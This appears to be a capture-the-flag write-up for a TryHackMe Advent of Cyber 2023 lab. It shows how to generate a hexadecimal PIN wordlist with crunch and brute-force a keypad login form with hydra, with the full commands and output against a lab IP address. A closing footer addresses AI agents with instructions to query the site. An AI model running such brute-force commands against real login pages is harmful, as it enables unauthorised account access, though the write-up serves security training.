# Day 3

### Learning Objectives

* Password complexity and the number of possible combinations
* How the number of possible combinations affects the feasibility of brute force attacks
* Generating password combinations using `crunch`
* Trying out passwords automatically using `hydra`

The room is very straightforward with all the commands given to us already we just need to run them.

After starting the maching and going to the site. We find a keypad like interface 

<figure><img src="/files/eMgCAl4ScAd5DY2qDMkO" alt=""><figcaption></figcaption></figure>

Upon entering a random code we can see it is only a 3 digit pin, should be very quick to brute force.&#x20;

The numeric keypad shows 16 characters, 0 to 9 and A to F, i.e., the hexadecimal digits. We need to prepare a list of all the PIN codes that match this criteria. We will use Crunch, a tool that generates a list of all possible password combinations based on given criteria. We need to issue the following command:

`crunch 3 3 0123456789ABCDEF -o 3digits.txt`

The command above specifies the following:

* `3` the first number is the minimum length of the generated password
* `3` the second number is the maximum length of the generated password
* `0123456789ABCDEF` is the character set to use to generate the passwords
* `-o 3digits.txt` saves the output to the `3digits.txt` file

```
┌──(kali㉿kali)-[~/THM/AOC2023/Day3]
└─$ crunch 3 3 0123456789ABCDEF -o 3digits.txt
Crunch will now generate the following amount of data: 16384 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 4096 

crunch: 100% completed generating output
```

the main login page <http://10.10.125.46:8000/pin.php> receives the input from the user and sends it to `/login.php` using the name `pin`.

These three pieces of information, `post`, `/login.php`, and `pin`, are necessary to set the arguments for Hydra.

We will use `hydra` to test every possible password that can be put into the system. The command to brute force the above form is:

{% code overflow="wrap" %}

```
hydra -l '' -P 3digits.txt -f -v 10.10.125.46 http-post-form "/login.php:pin=^PASS^:Access denied" -s 8000
```

{% endcode %}

The command above will try one password after another in the `3digits.txt` file.

{% code overflow="wrap" %}

```
┌──(kali㉿kali)-[~/THM/AOC2023/Day3]
└─$ hydra -l '' -P 3digits.txt -f -v 10.10.125.46 http-post-form "/login.php:pin=^PASS^:Access denied" -s 8000
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-04 00:54:33
[DATA] max 16 tasks per 1 server, overall 16 tasks, 4096 login tries (l:1/p:4096), ~256 tries per task
[DATA] attacking http-post-form://10.10.125.46:8000/login.php:pin=^PASS^:Access denied
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[VERBOSE] Page redirected to http[s]://10.10.125.46:8000/error.php
[VERBOSE] Page redirected to http[s]://10.10.125.46:8000/error.php
[VERBOSE] Page redirected to http[s]://10.10.125.46:8000/error.php
.
.
.
[VERBOSE] Page redirected to http[s]://10.10.125.46:8000/error.php
[VERBOSE] Page redirected to http[s]://10.10.125.46:8000/control.php
[VERBOSE] Page redirected to http[s]://10.10.125.46:8000/error.php
[VERBOSE] Page redirected to http[s]://10.10.125.46:8000/error.php
[VERBOSE] Page redirected to http[s]://10.10.125.46:8000/error.php
[VERBOSE] Page redirected to http[s]://10.10.125.46:8000/error.php
[VERBOSE] Page redirected to http[s]://10.10.125.46:8000/error.php
[8000][http-post-form] host: 10.10.125.46   password: [REDACTED]
[STATUS] attack finished for 10.10.125.46 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-12-04 00:56:52

```

{% endcode %}

We get the PIN for the keypad. Now we just enter it in the Keypad.

<figure><img src="/files/sCgqKC7XdUg1t4DS480K" alt=""><figcaption></figcaption></figure>

Now we just need to click on Unlock Door and it will give us our flag.

<figure><img src="/files/EVyLIYSBsZ8HA3hKOGQH" alt=""><figcaption></figcaption></figure>

***


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://bunring.gitbook.io/ctf-writeups/try-hack-me/advent-of-cyber-2023/day-3.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.